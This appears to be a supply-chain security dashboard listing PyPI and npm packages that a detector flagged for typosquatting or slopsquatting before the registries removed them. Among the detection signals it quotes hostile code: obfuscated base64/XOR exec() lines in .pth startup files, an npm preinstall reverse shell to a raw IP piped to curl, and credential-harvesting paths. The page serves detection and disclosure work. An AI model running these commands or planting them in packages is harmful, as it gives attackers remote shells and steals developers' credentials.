Automated package-squatting & slopsquatting detection signals across PyPI and npm — these are automated, unconfirmed signals. Use them to find candidates to investigate, but don't automatically assume they're malicious.

Packages Sentinel flagged (a real threat verdict, non-zero score) that PyPI or npm then removed. The verdict and score are frozen at the moment of takedown — what Sentinel assessed before the package came down, not a re-check of a now-empty name. Lead time is shown in hours where we have it: a live detection often beats the registry by hours. Rows from our one-time historical sweep show no lead time — that sweep only knows the package was already gone when it looked.

Newest removal first. Expand a row for the full package detail Sentinel captured before takedown. • Tag & Signal Legend →

Search & filter syntax reference
Filter with verdict:, ecosystem: (pypi/npm), hook:, email:, domain:, keyword:, version: (comma = OR within a field, space = AND across fields), lead:>7d / lead:>30d (days we had it flagged while it was still up), or a bare word for a package-name search. This tab is always scoped to removed packages.
Package Verdict Score Lead time First flagged Taken down Source Lines Targeted Ecosystem Version Author Email domain Signals
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed pypi added 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed pypi added 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed pypi added 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed pypi added 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
122 +5h 2026-09-11
10:11 UTC
2026-09-11
18:17 UTC
registry removed 8 @nimbusedge/auth npm 19999.0.6 🪝
Removed from: npm (registry removed)
First flagged by Sentinel: 2026-09-11 10:11 UTC
Last confirmed live: 2026-09-11 15:33 UTC
Removed: 2026-09-11 18:17 UTC
Lead time: +5h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 122
Matched naming pattern: npm-@nimbusedge/auth-general
Official vendor account: No — publisher domain doesn't match the brand it names
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8 lines, 339 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALPackage registered with suspiciously high major version (v19999.0.6, major 19999) despite recent registration (0 days ago, 7 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • INFOPackage affiliated with trusted vendor '@nimbusedge/auth' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (195 -> 97) to reduce false positives while retaining hijack/takeover detection.
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • MISSING_SOURCE_REPOSITORY_URL

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down Very Risky
270 not measured 2026-09-07
20:10 UTC ~
registry removed 122 company pypi 0.0.1 🪝 📡 🗄️
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 4.8d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 270
Claimed homepage: https://pypi.org/project/company-sdk/
Matched naming pattern: python-company-general
Official vendor account: No — publisher domain doesn't match the brand it names
Registry downloads (last seen): 47/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 122 lines, 4.9 kB across 2 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (5 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in company_sdk-0.0.1/company_sdk.py:110
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in company_sdk-0.0.1/company_sdk.py:8
  • HIGHANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in company_sdk-0.0.1/company_sdk.py:115
  • HIGHCREDENTIAL_PATH_HARVESTING: 'AWS Credentials (~/.aws/credentials)' found in company_sdk-0.0.1/company_sdk.py:56
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in company_sdk-0.0.1/company_sdk.py:47
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in company_sdk-0.0.1/company_sdk.py:110
  • EXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in company_sdk-0.0.1/company_sdk.py:8
  • ANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in company_sdk-0.0.1/company_sdk.py:115
  • CREDENTIAL_PATH_HARVESTING: 'AWS Credentials (~/.aws/credentials)' found in company_sdk-0.0.1/company_sdk.py:56
  • CREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in company_sdk-0.0.1/company_sdk.py:47
  • CREDENTIAL_PATH_HARVESTING: 'Registry / Git Configuration (~/.yarnrc, ~/.gitconfig)' found in company_sdk-0.0.1/company_sdk.py:79
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Provider Credentials (GCP, Azure, DigitalOcean)' found in company_sdk-0.0.1/company_sdk.py:57
  • CREDENTIAL_PATH_HARVESTING: 'Infrastructure & DB Credentials (~/.terraform.d, ~/.vault-token, ~/.pgpass, ~/.netrc)' found in company_sdk-0.0.1/company_sdk.py:90

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
140 not measured 2026-09-07
20:10 UTC ~
registry removed 49 dbt pypi 0.0.1 Security Research rootxravi@gmail.com gmail.com 🪝 📡
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 2.7d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 140
Claimed homepage: https://pypi.org/project/dbt-sa-cli/
Matched naming pattern: python-dbt-general
Official vendor account: No — publisher domain doesn't match the brand it names
Code-only verdict: SUSPICIOUS (the score also weighs naming and publisher-domain signals, not just the code)
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 49 lines, 1.6 kB across 2 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (2 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: Call to os.environ.get() in dbt_sa_cli-0.0.1/setup.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: Access to os.environ in dbt_sa_cli-0.0.1/setup.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: Call to os.environ.get() in dbt_sa_cli-0.0.1/setup.py:9
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'DNS Subdomain Exfiltration' found in dbt_sa_cli-0.0.1/setup.py:19
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in dbt_sa_cli-0.0.1/setup.py:9
  • HIGHCUSTOM_BUILD_BACKEND_UNVERIFIED: 'setuptools.backends._legacy:_Backend' declared in pyproject.toml
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: Call to os.environ.get() in dbt_sa_cli-0.0.1/setup.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: Access to os.environ in dbt_sa_cli-0.0.1/setup.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: Call to os.environ.get() in dbt_sa_cli-0.0.1/setup.py:9
  • EXFILTRATION_DESTINATION_DETECTED: 'DNS Subdomain Exfiltration' found in dbt_sa_cli-0.0.1/setup.py:19
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in dbt_sa_cli-0.0.1/setup.py:9
  • CUSTOM_BUILD_BACKEND_UNVERIFIED: 'setuptools.backends._legacy:_Backend' declared in pyproject.toml

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
140 not measured 2026-09-07
20:10 UTC ~
registry removed 6 uvhttp pypi 1.7.9 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 4.3d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 140
Claimed homepage: https://pypi.org/project/uvhttp-custom/
Matched naming pattern: python-uvhttp-general
Official vendor account: No — publisher domain doesn't match the brand it names
Code-only verdict: Very Risky (the score also weighs naming and publisher-domain signals, not just the code)
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 6 lines, 2.1 kB across 1 file (EMPTY_STUB)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (4 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALINSTALL_TIME_EXECUTION: 'exec' executed at top-level in uvhttp_custom-1.7.9/setup.py:1
  • MEDIUMPackage is an empty placeholder (6 LOC, 1 file(s), 2132 bytes).
  • INFOModerate community usage with 192 monthly downloads.
  • MEDIUMPackage executes code at install/import time, but no exfiltration destination, credential access, encoded payload, obfuscation, shell cradle, or persistence primitive corroborates a weaponized payload. Downgraded from MALICIOUS to SUSPICIOUS pending manual review.
Static code signals:
  • INSTALL_TIME_EXECUTION: 'exec' executed at top-level in uvhttp_custom-1.7.9/setup.py:1

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 5h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: node-google-nolb-_expo-google-fonts_n
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name '@zalastax/nolb-_expo-google-fonts_n' matches AI hallucination template [node] + [google] + [nolb-_expo-google-fonts_n].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed cursor pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-cursor-headroom
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'headroom-cursor' matches AI hallucination template [python] + [cursor] + [headroom].
  • HIGHClaims critical enterprise brand identity ('CURSOR').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed claude pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 14h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-claude-world
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-world' matches AI hallucination template [python] + [claude] + [world].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed web3 pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-web3-cojodi
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'cojodi-web3' matches AI hallucination template [python] + [web3] + [cojodi].
  • HIGHClaims critical enterprise brand identity ('WEB3').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed llama pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: skulk-llama-server
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'skulk-llama-server-cuda' matches AI hallucination template [skulk] + [llama] + [server].
  • HIGHClaims critical enterprise brand identity ('LLAMA').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed circle pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: bytedance-circle-engineer
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'bytedance-circle-engineer' matches AI hallucination template [bytedance] + [circle] + [engineer].
  • HIGHClaims critical enterprise brand identity ('CIRCLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed binance pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-binance-balance
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'binance-balance' matches AI hallucination template [python] + [binance] + [balance].
  • HIGHClaims critical enterprise brand identity ('BINANCE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: gax-google-devtools
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'gax-google-devtools-cloudtrace-v1' matches AI hallucination template [gax] + [google] + [devtools].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed binance pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-binance-alan
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'binance-alan' matches AI hallucination template [python] + [binance] + [alan].
  • HIGHClaims critical enterprise brand identity ('BINANCE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed claude pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 14h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-claude-dash
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-dash' matches AI hallucination template [python] + [claude] + [dash].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed elevenlabs pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-elevenlabs-unleashed
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'elevenlabs-unleashed' matches AI hallucination template [python] + [elevenlabs] + [unleashed].
  • HIGHClaims critical enterprise brand identity ('ELEVENLABS').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed eth pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-eth-vyper
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'eth-vyper' matches AI hallucination template [python] + [eth] + [vyper].
  • HIGHClaims critical enterprise brand identity ('ETH').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-google-tangelo
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'google-tangelo' matches AI hallucination template [python] + [google] + [tangelo].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed ledger pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: byted-ledger-life
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'byted-overpass-life-alliance-ledger' matches AI hallucination template [byted] + [ledger] + [life].
